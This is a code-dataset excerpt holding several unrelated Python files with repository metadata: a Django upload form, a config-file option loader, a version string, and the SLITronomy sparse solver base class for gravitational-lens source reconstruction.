ds['Apiocoin-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.95
| 1,817
| 0.724778
|
ae11f429e05e898ed4f2102e3645a2ef36a1d317
| 655
|
py
|
Python
|
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
import zipfile
from cStringIO import StringIO
CHOICES = [
(0, 'validate'),
(1, 'upload'),
]
class CSetForm(forms.Form):
target_name = forms.CharField(label='Target', max_length=100)
sdf_file = forms.FileField(label='All compounds sdf (.sdf)')
pdb_zip = forms.FileField(required=False, label='PDB files (.zip)')
submit_choice = forms.CharField(widget=forms.RadioSelect(choices=CHOICES))
upload_key = forms.CharField(label='Upload Key')
class UploadKeyForm(forms.Form):
contact_email = forms.EmailField(widget=forms.TextInput(attrs={'class':'form-control', 'autocomplete':'off'}), required=True)
| 32.75
| 129
| 0.723664
|
a5630ed7c0808b97cbd43c8cc31c9f3098aafb2a
| 11,342
|
py
|
Python
|
src/config/options.py
|
spunkmars/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 23
|
2020-04-14T07:50:38.000Z
|
2022-01-27T09:07:19.000Z
|
src/config/options.py
|
bjzhangyong/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 8
|
2021-03-19T09:01:16.000Z
|
2022-02-10T12:28:55.000Z
|
src/config/options.py
|
bjzhangyong/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 6
|
2020-04-14T13:34:29.000Z
|
2022-01-25T04:05:16.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
if sys.version_info >= (3, 6, 0):
import configparser as ConfigParser
else:
import ConfigParser
from django.utils.translation import ugettext_lazy
from django.utils.translation import ugettext
from spmo.common import Common
def get_conf_obj(config_file=None):
config = ConfigParser.ConfigParser()
config.read(config_file)
return config
def get_conf_to_dict(config_file=None):
c_dict = {}
config = get_conf_obj(config_file=config_file)
sections = config.sections()
for sect in sections:
c_dict[sect] = config.items(sect)
return c_dict
def get_option_val(conf_obj=None, section=None, c_k={}):
if conf_obj.has_option(section, c_k['name']):
if c_k['type'] == 'boolean':
return conf_obj.getboolean(section, c_k['name'])
elif c_k['type'] == 'int':
return conf_obj.getint(section, c_k['name'])
elif c_k['type'] == 'float':
return conf_obj.getfloat(section, c_k['name'])
elif c_k['type'] == 'list':
cl = []
cl_str = conf_obj.get(section, c_k['name'])
cl = cl_str.split(',')
cl = [l.strip() for l in cl]
return cl
elif c_k['type'] == 'text':
return conf_obj.get(section, c_k['name'])
else:
return conf_obj.get(section, c_k['name'])
elif 'has_default' in c_k and c_k['has_default'] is True and 'default' in c_k:
return c_k['default']
else:
raise Exception('Can not find option, and has not defualt !')
def get_section_val(conf_obj=None, section=None, c_ks={}):
c_args = {}
if not conf_obj.has_section(section):
raise Exception('Can not find section: [%s] !' % section)
for k in c_ks:
if k['require'] is True:
if not conf_obj.has_option(section, k['name']):
raise Exception('Can not find section: [%s] option: [%s] !' % (section, k['name']))
c_args[k['name']] = get_option_val(conf_obj=conf_obj, section=section, c_k=k)
return c_args
def get_common_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'site_name', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_desc', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_version', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_copyright_year', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'secret_key', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'debug', 'type': 'boolean', 'default': False, 'require': False,
'has_default': True},
{'name': 'time_zone', 'type': 'text', 'default': 'Asia/Shanghai', 'require': False,
'has_default': True},
{'name': 'language_code', 'type': 'text', 'default': 'en-us', 'require': False,
'has_default': True},
],
'cors':
[
{'name': 'cors_allow_credentials', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'cors_origin_allow_all', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'cors_origin_whitelist', 'type': 'list', 'default': [], 'require': False,
'has_default': True},
]
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
sections['cors'] = get_section_val(conf_obj=config, section='cors', c_ks=c_keys['cors'])
c_args = sections
return c_args
def get_db_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'db_type', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
'sqlite':
[
{'name': 'db_name', 'type': 'text', 'default': None, 'require': True,
'has_default': False}, ],
'mysql':
[
{'name': 'host', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'port', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
{'name': 'user', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'passwd', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'db', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
'redis':
[
{'name': 'type', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'host', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'port', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
{'name': 'user', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'passwd', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'db', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
],
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
if sections['common']['db_type'] == 'sqlite':
sections['sqlite'] = get_section_val(conf_obj=config, section='sqlite', c_ks=c_keys['sqlite'])
elif sections['common']['db_type'] == 'mysql':
sections['mysql'] = get_section_val(conf_obj=config, section='mysql', c_ks=c_keys['mysql'])
sections['redis'] = get_section_val(conf_obj=config, section='redis', c_ks=c_keys['redis'])
c_args = sections
return c_args
def get_cas_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'mama_cas_enable_single_sign_out', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'allow_sites', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
{'name': 'deny_sites', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
],
'site':
[
{'name': 'service', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'callbacks', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
{'name': 'logout_allow', 'type': 'boolean', 'default': None, 'require': True,
'has_default': False},
{'name': 'logout_url', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
allow_sites = []
if 'allow_sites' in sections['common']:
a_sites = sections['common']['allow_sites']
if 'deny_sites' in sections['common']:
d_sites = sections['common']['deny_sites']
allow_sites = list(set(a_sites) - set(d_sites))
else:
allow_sites = a_sites
for s in allow_sites:
sections[s] = get_section_val(conf_obj=config, section=s, c_ks=c_keys['site'])
c_args = sections
return c_args
class GoballOptions(Common):
def __init__(self, *args, **kwargs):
self.trans_type = kwargs.get('trans_type', 'lazy')
self.OPTIONS = {}
self.set_trans(trans_type=self.trans_type)
super(GoballOptions, self).__init__(*args, **kwargs)
def original_output(self, var_s=''):
return var_s
def set_trans(self, **kwargs):
self.trans_type = kwargs.get('trans_type', self.trans_type)
if self.trans_type == 'lazy':
self.trans = ugettext_lazy
elif self.trans_type == 'original':
self.trans = self.original_output
elif self.trans_type == 'immediate':
self.trans = ugettext
else:
self.trans = self.original_output
self.set_options()
def set_option(self, var_name, val):
setattr(self, var_name, val)
self.OPTIONS[var_name] = val
def set_options(self):
self.set_option('INT_CHOICES',
(
(0, self.trans('True')),
(1, self.trans('False')),
)
)
self.set_option('STATUS_CHOICES',
(
(0, self.trans('Valid')),
(1, self.trans('Spare')),
(2, self.trans('Invalid')),
)
)
self.set_option('BOOLEAN_CHOICES',
(
('true', self.trans('true')),
('false', self.trans('false')),
)
)
self.set_option('TBOOLEAN_CHOICES',
(
(True, self.trans('true')),
(False, self.trans('false')),
)
)
self.set_option('TF_CHOICES',
(
(True, self.trans('True')),
(False, self.trans('False')),
)
)
def trans_tuple_to_dict(self, v_tuple):
n_dict = {}
for vv in v_tuple:
n_dict[vv[1]] = vv[0]
return n_dict
def reverse_dict(self, dict={}):
n_dict = {}
for key in dict:
n_dict[dict[key]] = key
return n_dict
def get_option(self, var_name=None):
return getattr(self, var_name)
def get_dict_option(self, var_name=None):
var = getattr(self, var_name)
return self.trans_tuple_to_dict(var)
def get_reverse_dict_option(self, var_name=None):
c_dict = self.get_dict_option(var_name)
n_dict = self.reverse_dict(c_dict)
return n_dict
def declare_goball_options(trans_type='lazy'):
GB_OP = GoballOptions(trans_type=trans_type)
for option in GB_OP.OPTIONS:
exec('global %s' % option)
exec('%s = GB_OP.get_option("%s")' % (option, option))
# 声明变量
declare_goball_options()
| 37.309211
| 113
| 0.515253
|
6a9e79b784b5fce2847d866b7ad311979c5d1d47
| 24
|
py
|
Python
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 174
|
2018-11-17T09:05:03.000Z
|
2020-04-17T21:50:47.000Z
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 7
|
2019-07-02T23:27:58.000Z
|
2020-04-18T02:50:58.000Z
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 21
|
2018-12-05T18:33:49.000Z
|
2020-04-18T03:58:30.000Z
|
__version__ = '0.4.150'
| 12
| 23
| 0.666667
|
4f0db8c58b9946fafc9eccd127dfcc073020a3d9
| 27,166
|
py
|
Python
|
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
__author__ = 'aymgal'
# class that implements SLIT algorithm
import copy
import numpy as np
from slitronomy.Optimization.model_operators import ModelOperators
from slitronomy.Lensing.lensing_operator import LensingOperator
from slitronomy.Optimization.noise_levels import NoiseLevels
from slitronomy.Util.solver_plotter import SolverPlotter
from slitronomy.Util.solver_tracker import SolverTracker
from slitronomy.Util import util
class SparseSolverBase(ModelOperators):
"""
Base class that generally defines a sparse solver
"""
#TODO: raises an error when number of decomposition scales is not consistent with image size
# (also when reducing source plane size, re-check consistency)
#TODO: create classes for lens and source models.
# E.g. the method project_on_original_grid_source should be attached to some new "SourceModel" class, not to the solver.
def __init__(self, data_class, lens_model_class, image_numerics_class, source_numerics_class,
lens_light_mask=None, source_interpolation='bilinear',
minimal_source_plane=False, use_mask_for_minimal_source_plane=True, min_num_pix_source=20,
min_threshold=3, threshold_increment_high_freq=1, threshold_decrease_type='exponential',
fixed_spectral_norm_source=0.98, include_regridding_error=False,
sparsity_prior_norm=1, force_positivity=True, formulation='analysis',
external_likelihood_penalty=False, random_seed=None,
verbose=False, show_steps=False, thread_count=1):
"""
:param data_class: lenstronomy.imaging_data.ImageData instance describing the data.
:param lens_model_class: lenstronomy.lens_model.LensModel instance describing the lens mass model.
:param image_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for image plane.
:param source_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for source plane.
:param lens_light_mask: boolean mask with False/0 to exclude pixels that are assumed to contain only lens light flux.
Defaults to None.
:param source_interpolation: type of interpolation of source pixels on the source plane grid.
It can be 'nearest' for nearest-neighbor or 'bilinear' for bilinear interpolation. Defaults to 'bilinear'.
:param minimal_source_plane: if True, reduce the source plane grid size to the minimum set by min_num_pix_source.
Defaults to False.
:param use_mask_for_minimal_source_plane: if True, use the likelihood_mask to compute minimal source plane.
Defaults to True.
:param min_num_pix_source: minimal number of pixels on a side of the square source grid.
Only used when minimal_source_plane is True. Defaults to 20.
:param min_threshold: in unit of the noise (sigma), minimum threshold for wavelets denoising.
Typically between 3 (more conservative thresholding) and 5 (more aggressive thresholding). Defaults to 3.
:param threshold_increment_high_freq: additive number to the threshold level (in unit of the noise) for the highest frequencies on wavelets space.
Defaults to 1.
:param threshold_decrease_type: strategy for decreasing the threshold level at each iteration. Can be 'none' (no decrease, directly sets to min_threshold), 'linear' or 'exponential'.
Defaults to None, which is 'exponential' for the source-only solver, 'linear' for the source-lens solver.
:param fixed_spectral_norm_source: if None, update the spectral norm for the source operator, for optimal gradient descent step size.
Defaults to 0.98, which is a conservative value typical of most lens models.
:param sparsity_prior_norm: prior l-norm (0 or 1). If 1, l1-norm and soft-thresholding are applied.
If 0, it is l0-norm and hard-thresholding. Defaults to 1.
:param force_positivity: if True, apply positivity constraint to the source flux.
Defaults to True.
:param formulation: type of formalism for the minimization problem. 'analysis' solves the problem in direct space.
'synthesis' solves the peoblem in wavelets space. Defaults to 'analysis'.
:param external_likelihood_penalty: if True, the solve() method returns a non-zero penalty,
e.g. for penalize more a given lens model during lens model optimization. Defaults to False.
:param random_seed: seed for random number generator, used to initialise the algorithm. None for no seed.
Defaults to None.
:param verbose: if True, prints statements during optimization.
Defaults to False.
:param show_steps: if True, displays plot of the reconstructed light profiles during optimization.
Defaults to False.
:param thread_count: number of threads (multithreading) to speedup wavelets computations (only works if pySAP is properly installed).
Defaults to 1.
"""
num_pix_x, num_pix_y = data_class.num_pixel_axes
if num_pix_x != num_pix_y:
raise ValueError("Only square images are supported")
image_grid_class = image_numerics_class.grid_class
source_grid_class = source_numerics_class.grid_class
lensing_operator_class = LensingOperator(lens_model_class, image_grid_class, source_grid_class, num_pix_x,
lens_light_mask=lens_light_mask,
minimal_source_plane=minimal_source_plane, min_num_pix_source=min_num_pix_source,
use_mask_for_minimal_source_plane=use_mask_for_minimal_source_plane,
source_interpolation=source_interpolation, verbose=verbose)
super(SparseSolverBase, self).__init__(data_class, lensing_operator_class, image_numerics_class,
fixed_spectral_norm_source=fixed_spectral_norm_source,
thread_count=thread_count, random_seed=random_seed)
# engine that computes noise levels in image / source plane, in wavelets space
self.noise = NoiseLevels(data_class, subgrid_res_source=source_grid_class.supersampling_factor,
include_regridding_error=include_regridding_error)
# threshold level k_min (in units of the noise)
self._k_min = min_threshold
if threshold_increment_high_freq < 0:
raise ValueError("threshold_increment_high_freq cannot be negative")
else:
self._increm_high_freq = threshold_increment_high_freq
# strategy to decrease threshold up to the max threshold above
if threshold_decrease_type not in ['none', 'lin', 'linear', 'exp', 'exponential']:
raise ValueError("threshold_decrease_type must be in ['none', 'lin', 'linear', 'exp', 'exponential']")
self._threshold_decrease_type = threshold_decrease_type
if sparsity_prior_norm not in [0, 1]:
raise ValueError("Sparsity prior norm can only be 0 or 1 (l0-norm or l1-norm)")
self._sparsity_prior_norm = sparsity_prior_norm
self._formulation = formulation
self._force_positivity = force_positivity
self._external_likelihood_penalty = external_likelihood_penalty
self._verbose = verbose
self._show_steps = show_steps
self._tracker = SolverTracker(self, verbose=verbose)
self._plotter = SolverPlotter(self, show_now=True)
def set_likelihood_mask(self, mask=None):
self._set_likelihood_mask(mask)
# fill masked pixels with background noise
self.fill_masked_data(self.noise.background_rms)
def solve(self, kwargs_lens, kwargs_source, kwargs_lens_light=None, kwargs_ps=None, kwargs_special=None,
init_lens_light_model=None, init_ps_model=None):
"""
main method to call from outside the class, calling self._solve()
any class that inherits SparseSolverSource should have self._ready() and self._solve() methods implemented,
with correct output.
"""
if not self._ready(): return
# update lensing operator and noise levels
self.prepare_solver(kwargs_lens, kwargs_source, kwargs_lens_light=kwargs_lens_light,
kwargs_special=kwargs_special, init_lens_light_model=init_lens_light_model, init_ps_model=init_ps_model)
# call solver
image_model, coeffs_source, coeffs_lens_light, amps_ps \
= self._solve(kwargs_lens=kwargs_lens, kwargs_ps=kwargs_ps, kwargs_special=kwargs_special)
# concatenate optimized parameters (wavelets coefficients, point source amplitudes)
all_param = np.concatenate([coeffs_source, coeffs_lens_light, amps_ps])
#WIP
if self._external_likelihood_penalty:
if self.no_lens_light:
logL_penalty = self.regularization(S=self.source_model)
else:
logL_penalty = self.regularization(S=self.source_model, HG=self.lens_light_model)
else:
logL_penalty = 0
return image_model, all_param, logL_penalty
def _solve(self, kwargs_lens=None, kwargs_ps=None, kwargs_special=None):
raise ValueError("This method must be implemented in class that inherits SparseSolverBase")
def _ready(self):
raise ValueError("This method must be implemented in class that inherits SparseSolverBase")
@property
def track(self):
return self._tracker.track
@property
def component_names(self):
return 'S', 'HG', 'P'
@property
def prior_l_norm(self):
return self._sparsity_prior_norm
def plot_results(self, **kwargs):
return self._plotter.plot_results(**kwargs)
def plot_source_residuals_comparison(self, *args, **kwargs):
return self._plotter.plot_source_residuals_comparison(*args, **kwargs)
@property
def source_model(self):
if not hasattr(self, '_source_model'):
raise ValueError("You must run the optimization before accessing the source estimate")
return self._source_model
@property
def lens_light_model(self):
if not hasattr(self, '_lens_light_model') and not self.no_lens_light:
raise ValueError("You must run the optimization before accessing the lens estimate")
if self.no_lens_light:
return None
return self._lens_light_model
@property
def point_source_model(self):
if not hasattr(self, '_ps_model') and not self.no_point_source:
raise ValueError("You must run the optimization before accessing the point source estimate")
if self.no_point_source:
return None
return self._ps_model
def image_model(self, unconvolved=False):
if self.no_lens_light and self.no_point_source:
S = self.source_model
if unconvolved:
return self.F(S)
return self.H(self.R(self.F(S)))
elif not self.no_point_source:
S, P = self.source_model, self.point_source_model
if unconvolved:
raise ValueError("Deconvolution is only supported for source light")
return self.H(self.R(self.F(S))) + P
else:
S, HG = self.source_model, self.lens_light_model
if unconvolved:
raise ValueError("Deconvolution is only supported for source light")
return self.H(self.R(self.F(S))) + HG
@property
def normalized_residuals_model(self):
""" returns ( HFS + HG + P - Y ) / sigma """
return self.normalized_residuals(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
@property
def residuals_model(self):
""" returns ( HFS + HG + P - Y ) """
return self.residuals(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
def generate_initial_source(self):
num_pix = self.num_pix_source
transform = self.Phi_T_s
return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed)
def generate_initial_lens_light(self):
num_pix = self.num_pix_image
transform = self.Phi_T_l
return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed)
def apply_image_plane_mask(self, image_2d):
return self.M(image_2d)
def apply_source_plane_mask(self, source_2d):
return self.M_s(source_2d)
def project_on_original_grid_source(self, source):
return self.lensingOperator.sourcePlane.project_on_original_grid(source)
def psf_convolution(self, array_2d):
return self.H(array_2d)
@property
def num_data_points(self):
"""
number of effective data points (= number of unmasked pixels)
"""
return int(np.sum(self._mask))
@property
def best_fit_reduced_chi2(self):
return self.reduced_chi2(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
@property
def best_fit_mean_squared_error(self):
return self.mean_squared_error(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
def loss(self, S=None, HG=None, P=None):
""" returns f = || Y - HFS - HG - P ||^2_2 """
model = self.model_analysis(S=S, HG=HG, P=P)
error = self.effective_image_data - model
norm_error = np.linalg.norm(error.flatten(), ord=2) # flatten to ensure L2-norm
return 0.5 * norm_error**2
def regularization(self, S=None, HG=None, P=None):
""" returns p = lambda * || W_S ø alpha_S ||_0,1 + lambda * || W_HG ø alpha_HG ||_0,1 """
if S is not None:
reg_S = self._regularization(S, self.Phi_T_s, self.M_s, self.noise.levels_source)
else:
reg_S = 0
if HG is not None:
reg_HG = self._regularization(HG, self.Phi_T_l, self.M, self.noise.levels_image)
else:
reg_HG = 0
return reg_S + reg_HG
def _regularization(self, image, transform, mask_func, noise_levels):
lambda_ = np.copy(noise_levels)
lambda_[0, :, :] *= (self._k_min + self._increm_high_freq)
lambda_[1:, :, :] *= self._k_min
alpha_image = mask_func(transform(image))
norm_alpha = np.linalg.norm((lambda_ * alpha_image).flatten(), ord=self._sparsity_prior_norm)
return norm_alpha
def residuals(self, S=None, HG=None, P=None):
model = self.model_analysis(S=S, HG=HG, P=P)
return model - self.effective_image_data
def normalized_residuals(self, S=None, HG=None, P=None):
""" returns ( HFS + HG + P - Y ) / sigma """
residuals = self.residuals(S=S, HG=HG, P=P)
if hasattr(self, '_ps_error'):
sigma = self.noise.effective_noise_map + self._ps_error
else:
sigma = self.noise.effective_noise_map
return self.M(residuals / sigma)
def reduced_chi2(self, S=None, HG=None, P=None):
red_res = self.normalized_residuals(S=S, HG=HG, P=P)
chi2 = np.sum(red_res**2)
return chi2 / self.num_data_points
def mean_squared_error(self, S=None, HG=None, P=None):
res = self.residuals(S=S, HG=HG, P=P)
return np.sum(res**2) / self.num_data_points
@staticmethod
def norm_diff(S1, S2):
""" returns || S1 - S2 ||_2 """
diff = S1 - S2
return np.linalg.norm(diff.flatten(), ord=2) # flatten to ensure L2-norm
def model_analysis(self, S=None, HG=None, P=None):
model = 0
if S is not None:
model += self.H(self.R(self.F(S)))
if HG is not None:
model += self.R(HG)
if P is not None:
model += P
return model
def model_synthesis(self, alpha_S=None, alpha_HG=None, P=None):
model = 0
if alpha_S is not None:
model = self.H(self.R(self.F(self.Phi_s(alpha_S))))
if alpha_HG is not None:
model += self.R(self.Phi_l(alpha_HG))
if P is not None:
model += P
return model
def gradient_loss_source(self, array_S):
if self._formulation == 'analysis':
return self._gradient_loss_analysis_source(S=array_S)
elif self._formulation == 'synthesis':
return self._gradient_loss_synthesis_source(alpha_S=array_S)
def gradient_loss_lens(self, array_HG):
if self._formulation == 'analysis':
return self._gradient_loss_analysis_lens(HG=array_HG)
elif self._formulation == 'synthesis':
return self._gradient_loss_synthesis_lens(alpha_HG=array_HG)
def proximal_sparsity_source(self, array, threshold, weights):
if self._formulation == 'analysis':
return self._proximal_sparsity_analysis_source(array, threshold, weights)
elif self._formulation == 'synthesis':
return self._proximal_sparsity_synthesis_source(array, threshold, weights)
def proximal_sparsity_lens(self, array, threshold, weights):
if self._formulation == 'analysis':
return self._proximal_sparsity_analysis_lens(array, threshold, weights)
elif self._formulation == 'synthesis':
return self._proximal_sparsity_synthesis_lens(array, threshold, weights)
def subtract_source_from_data(self, S):
"""Update "effective" data by subtracting the input source light estimation"""
source_model = self.model_analysis(S=S, HG=None)
self.subtract_from_data(source_model)
def subtract_lens_from_data(self, HG):
"""Update "effective" data by subtracting the input (convolved) lens light estimation"""
lens_model = self.model_analysis(S=None, HG=HG)
self.subtract_from_data(lens_model)
def subtract_point_source_from_data(self, P):
"""Update "effective" data by subtracting the input (convolved) lens light estimation"""
self.subtract_from_data(P)
@property
def algorithm(self):
if self._formulation == 'analysis':
return 'FB'
elif self._formulation == 'synthesis':
return 'FISTA'
def prepare_solver(self, kwargs_lens, kwargs_source, kwargs_lens_light=None,
kwargs_special=None, init_lens_light_model=None, init_ps_model=None):
"""
Update state of the solver : operators, noise levels, ...
The order of the following updates matters!
"""
_, _ = self.lensingOperator.update_mapping(kwargs_lens, kwargs_special=kwargs_special)
if self.noise.include_regridding_error is True:
magnification_map = self.lensingOperator.magnification_map(kwargs_lens)
self.noise.update_regridding_error(magnification_map)
self._prepare_source(kwargs_source)
if not self.no_lens_light:
# TODO: support upsampling/downsampling operator for image plane noise levels
self._prepare_lens_light(kwargs_lens_light)
# lens light initial model, if any
self._init_lens_light_model = init_lens_light_model
# point source initial model, if any
if not self.no_point_source and init_ps_model is None:
raise ValueError("A rough point source model is required to optimize point source amplitudes")
self._init_ps_model = init_ps_model
def _prepare_source(self, kwargs_source):
"""
updates source number of decomposition scales, spectral norm and noise levels
related to the operator H(F(Phi_T_s( . )))
"""
# update number of decomposition scales
n_scales_new = kwargs_source[0]['n_scales']
if n_scales_new == -1:
num_pix_source = self.lensingOperator.sourcePlane.num_pix
n_scales_new = int(np.log2(num_pix_source))
if self._verbose:
print("Set number of source scales to maximal value J={}".format(n_scales_new))
self.set_source_wavelet_scales(n_scales_new)
# update spectral norm of operators
self.update_spectral_norm_source()
# update wavelets noise levels in source plane
self.update_source_noise_levels()
def _prepare_lens_light(self, kwargs_lens_light):
"""
updates lens light number of decomposition scales, spectral norm and noise levels
related to the operator Phi_T_l( . )
Spectral norm and noise levels related to the Phi_T_l operator
are not updated if the number of decomposition scales has not changed
"""
# get n_scales for lens light before update
n_scales_old = self.n_scales_lens_light
n_scales_new = kwargs_lens_light[0]['n_scales']
if n_scales_new == -1:
num_pix_image = self.lensingOperator.imagePlane.num_pix
n_scales_new = int(np.log2(num_pix_image))
if self._verbose:
print("Set number of lens light scales to maximal value J={}".format(n_scales_new))
# update number of decomposition scales
self.set_lens_wavelet_scales(n_scales_new)
if n_scales_old is None or n_scales_new != n_scales_old:
# update spectral norm of operators
self.update_spectral_norm_lens()
# update wavelets noise levels in image plane
self.update_image_noise_levels()
def update_source_noise_levels(self):
self.noise.update_source_levels(self.num_pix_image, self.num_pix_source,
self.Phi_T_s, self.F_T, self.R_T,
psf_kernel=self.psf_kernel)
def update_image_noise_levels(self):
self.noise.update_image_levels(self.num_pix_image, self.Phi_T_l)
def _update_weights(self, alpha_S, alpha_HG=None, threshold=None):
lambda_S = np.copy(self.noise.levels_source)
if threshold is None:
threshold = self._k_min
lambda_S[1:, :, :] *= threshold
lambda_S[0, :, :] *= (threshold + self._increm_high_freq)
weights_S = 1. / ( 1 + np.exp(10 * (alpha_S - lambda_S)) ) # fixed Eq. (C.1)
if alpha_HG is not None:
lambda_HG = np.copy(self.noise.levels_image)
lambda_HG[1:, :, :] *= threshold
lambda_HG[0, :, :] *= (threshold + self._increm_high_freq)
weights_HG = 1. / ( 1 + np.exp(10 * (alpha_HG - lambda_HG)) ) # fixed Eq. (C.1)
else:
weights_HG = None
return weights_S, weights_HG
def _estimate_threshold_source(self, data, fraction=0.9):
"""
estimate maximum threshold, in units of noise, used for thresholding wavelets
coefficients during optimization
Parameters
----------
data : array_like
Imaging data.
fraction : float, optional
From 0 to 1, fraction of the maximum value of the image in transformed space, normalized by noise, that is returned as a threshold.
Returns
-------
float
Threshold level.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
noise_no_coarse = self.noise.levels_source[:-1, :, :]
# compute threshold wrt to the source component
coeffs = self.Phi_T_s(self.F_T(self.R_T(self.H_T(data))))
coeffs_no_coarse = coeffs[:-1, :, :]
coeffs_norm = self.M_s(coeffs_no_coarse / noise_no_coarse)
coeffs_norm[noise_no_coarse == 0] = 0
return fraction * np.max(coeffs_norm) # returns a fraction of max value, so only the highest coeffs is able to enter the solution
def _estimate_threshold_MOM(self, data_minus_HFS, data_minus_HG=None):
"""
Follows a mean-of-maximum strategy (MOM) to estimate thresholds for blind source separation with two components,
typically in a problem solved through morphological component analysis (see Bobin et al. 2007).
Note that we compute the MOM in image plane, even for the source component.
Parameters
----------
data_minus_HFS : array_like
2D array of the imaging data with lensed convolved source subtracted.
data_minus_HG : array_like, optional
2D array of the imaging data with convolved lens light subtracted.
Returns
-------
float
Estimated threshold in the sense of the MOM.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
noise_no_coarse = self.noise.levels_image[:-1, :, :]
coeffs1_no_coarse = self.Phi_T_l(self.R_T(data_minus_HFS))[:-1, :, :]
coeffs1_norm = self.M(coeffs1_no_coarse / noise_no_coarse)
coeffs1_norm[noise_no_coarse == 0] = 0
max_HFS = np.max(np.abs(coeffs1_norm))
if data_minus_HG is not None:
coeffs2_no_coarse = self.Phi_T_l(self.R_T(data_minus_HG))[:-1, :, :]
coeffs2_norm = self.M(coeffs2_no_coarse / noise_no_coarse)
coeffs2_norm[noise_no_coarse == 0] = 0
max_HG = np.max(np.abs(coeffs2_norm))
else:
max_HG = max_HFS
maxs = np.array([max_HFS, max_HG])
return maxs.min() + 0.001 * np.abs(max_HFS - max_HG) # SLIT_MCA version
# return maxs.min() - 0.01 * ( maxs.max() - maxs.min() ) # MuSCADeT version
# return np.mean(maxs) # original mean-of-max from Bobin et al. 2007
def _update_threshold(self, k, k_init, n_iter, n_iter_fix=5):
"""Computes a exponentially decreasing value, for a given loop index, starting at a specified value.
Parameters
----------
k : float
Current threshold.
k_init : float
Threshold value at iteration 0.
n_iter : int
Total number of iterations.
n_iter_fix : int, optional.
Number of iteration for which the threshold equals its minimum set vaélue `self._k_min`.
Defaults to 5.
Returns
-------
float
Decreased threshold, corresponding to the type of decrease.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
elif self._threshold_decrease_type in ['lin', 'linear']:
return util.linear_decrease(k, k_init, self._k_min, n_iter, n_iter_fix)
elif self._threshold_decrease_type in ['exp', 'exponential']:
return util.exponential_decrease(k, k_init, self._k_min, n_iter, n_iter_fix)
| 46.837931
| 190
| 0.656666
|
fa0c22c19de3e9b156049b11657468f5940684d4
| 17,828
|
py
|
Python
|
